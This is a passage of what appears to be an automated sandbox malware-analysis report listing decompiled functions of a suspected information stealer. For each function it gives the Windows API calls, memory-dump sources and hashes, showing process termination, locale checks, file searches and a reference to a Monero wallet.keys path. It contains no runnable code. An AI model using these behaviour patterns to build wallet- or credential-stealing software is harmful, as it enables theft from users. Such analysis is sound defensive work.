                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: cb841ded459cff5bd7aee9dc688c149b7732a06ee80fe48ae2def66b75bbb6e8
                                        • Instruction ID: e55e1d412d6709fffa64d90ab44f389cef2a80bb2f82a24543379ac4483668f8
                                        • Opcode Fuzzy Hash: cb841ded459cff5bd7aee9dc688c149b7732a06ee80fe48ae2def66b75bbb6e8
                                        • Instruction Fuzzy Hash: DA911272A00208EBCB14FFB0ED5AFED737DAF94345F40855DB90656141FA389B588B92
                                        Function 00C09C6B Relevance: 12.9, Strings: 9, Instructions: 1680COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ]}$]}$.t~_$X_}$Z[;$r{l$zz${Tq$'~
                                        • API String ID: 0-2082727148
                                        • Opcode ID: b1f6bf1453156bda898c67285cd6d1ce711244ef19e692a2830b37b2bccb41b6
                                        • Instruction ID: 693e0abaeefffca12227ed02779600a133ff3d06751e9df1321ca1ce86b924c8
                                        • Opcode Fuzzy Hash: b1f6bf1453156bda898c67285cd6d1ce711244ef19e692a2830b37b2bccb41b6
                                        • Instruction Fuzzy Hash: 21B237F3A0C204AFE3046E2DEC8567ABBE9EF94720F1A453DEAC5C3744E67558018697
                                        Function 007C98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C9905
                                        • Process32First.KERNEL32(007B9FDE,00000128), ref: 007C9919
                                        • Process32Next.KERNEL32(007B9FDE,00000128), ref: 007C992E
                                        • StrCmpCA.SHLWAPI(?,007B9FDE), ref: 007C9943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C997A
                                        • CloseHandle.KERNEL32(00000000), ref: 007C9987
                                        • CloseHandle.KERNEL32(007B9FDE), ref: 007C9993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 6d7c6ba183cd44c53dc53c7faa9ffe579a2c47bb723ea365bd29c0edbf28fbfa
                                        • Instruction ID: 363ab5c33d2f3ea902ab38ad967e223a4478308c2cd1181f3dbb45b6973c51b1
                                        • Opcode Fuzzy Hash: 6d7c6ba183cd44c53dc53c7faa9ffe579a2c47bb723ea365bd29c0edbf28fbfa
                                        • Instruction Fuzzy Hash: 6611DDB5904218EBDB64DFE4DC4CBDDB779AB88701F10458CF605A6250DB74AA85CF90
                                        Function 00BFE0A5 Relevance: 11.6, Strings: 8, Instructions: 1647COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /:?$?g]$a|G$a|G$g0~|$pr/$s]+$wUn
                                        • API String ID: 0-2382928104
                                        • Opcode ID: 7ef632983e5943ae154c5ddab3bbc08ccb3c6d0379ae3405e0384f51a4ae7cb2
                                        • Instruction ID: b0c3dad871df409ecaf0864ad4b2ec5368453516efd9f03808a5601b5bb09911
                                        • Opcode Fuzzy Hash: 7ef632983e5943ae154c5ddab3bbc08ccb3c6d0379ae3405e0384f51a4ae7cb2
                                        • Instruction Fuzzy Hash: 13B206F3A082049FE3046E2DDC8567AFBEAEFD4620F1A853DE6C4C7744EA7558058692
                                        Function 007C7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,007D05B7), ref: 007C7D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007C7D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 007C7D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007C7DF2
                                        • LocalFree.KERNEL32(00000000), ref: 007C7EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: e3de5476509d4e0d30d4951a3343f0d7fad9f82b91a84a901c64099967babaca
                                        • Instruction ID: 1bcf4a4ade87f94fa3cb61ff1b0b87a176cfb77a71ffa6f2d3541c2ab8f5130c
                                        • Opcode Fuzzy Hash: e3de5476509d4e0d30d4951a3343f0d7fad9f82b91a84a901c64099967babaca
                                        • Instruction Fuzzy Hash: EF4128B1940218EBCB24DB94DC99FEEB778EB44705F2041DDE50A62290DB386F85CFA1
                                        Function 007BE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,007D0D79), ref: 007BE5A2
                                        • StrCmpCA.SHLWAPI(?,007D15F0), ref: 007BE5F2
                                        • StrCmpCA.SHLWAPI(?,007D15F4), ref: 007BE608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 007BECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: fe4b5e0d208d7623b13d022b59da08162e59fffba15d3ffb129a2e7272416611
                                        • Instruction ID: 9fedb4435165b0d46ecabb311f5b8bc49ae77b95bca5b3b23052308840692995
                                        • Opcode Fuzzy Hash: fe4b5e0d208d7623b13d022b59da08162e59fffba15d3ffb129a2e7272416611
                                        • Instruction Fuzzy Hash: 3312F071A1011CEBCB14FB60DDAAFED733AAF54305F4045ADB50A56191EE386F48CB62
                                        Function 007BA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
                                        • LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: >O{
                                        • API String ID: 4291131564-1635969782
                                        • Opcode ID: f7f7302edc86d3b66e422db74606128b44dac5eda2c9d8874f1c9e6617ce32da
                                        • Instruction ID: 44c7c7e3d2de1eb3673a5a7a1cd92698a04e9a2a4aac151fc6202f27f4a6e908
                                        • Opcode Fuzzy Hash: f7f7302edc86d3b66e422db74606128b44dac5eda2c9d8874f1c9e6617ce32da
                                        • Instruction Fuzzy Hash: 94119074640308AFEB11CFA4CC95FAA77B5FB89B10F208458F9199B290C7B6A941CB50
                                        Function 00C03063 Relevance: 7.9, Strings: 5, Instructions: 1699COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: EA~~$N%E$^+E$^lv${=_
                                        • API String ID: 0-3001190425
                                        • Opcode ID: 527916e1cef697712f7355ca09ecf263d150847a35bef7ccfba4b87458b8371e
                                        • Instruction ID: 4172b155e1c428ae40e2daf633edcd50c0192d0d53ca21ac3b89b72488bd03dc
                                        • Opcode Fuzzy Hash: 527916e1cef697712f7355ca09ecf263d150847a35bef7ccfba4b87458b8371e
                                        • Instruction Fuzzy Hash: 95B218F360C6049FE304AE2DEC8567AFBE9EBD4320F16863DE6C4C7744EA3558058696
                                        Function 00C0D429 Relevance: 7.9, Strings: 5, Instructions: 1625COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 5~!$?O5$D9?$`+{}$z^/~
                                        • API String ID: 0-373533715
                                        • Opcode ID: 3399998ba0f61c29ca76a1ab22f2ff58723c6f853c5ed289b43fa5603049dbf6
                                        • Instruction ID: 4dcc714600e67874384dde41e1cef53156d45aa8783d5f6a559c90e4ae8c0f3c
                                        • Opcode Fuzzy Hash: 3399998ba0f61c29ca76a1ab22f2ff58723c6f853c5ed289b43fa5603049dbf6
                                        • Instruction Fuzzy Hash: 41B2F6F36086049FE304AE2DEC8567AFBE5EFD4720F1A892DE6C4C7744EA3558058692
                                        Function 00C067C6 Relevance: 7.8, Strings: 5, Instructions: 1583COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: *1n$0fCw$3w$4%7"$|}x
                                        • API String ID: 0-304112365
                                        • Opcode ID: 9190fee7dd63454e995546c7ed4ee62d26711084da25ad760c846aee538f2743
                                        • Instruction ID: 9109503a42757a7d9a8f1c279b3f24900c27d7f1f21bfddff7295871564d9231
                                        • Opcode Fuzzy Hash: 9190fee7dd63454e995546c7ed4ee62d26711084da25ad760c846aee538f2743
                                        • Instruction Fuzzy Hash: 7AB2D4F3A0C200AFE7046E2DEC8567ABBE5EB94720F16493DE6C5C7340E67598418797
                                        Function 0081F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: 01b65de4ea88c228c13c6719d78c441e6711ad605a64f3b7729e7f55b6f661d1
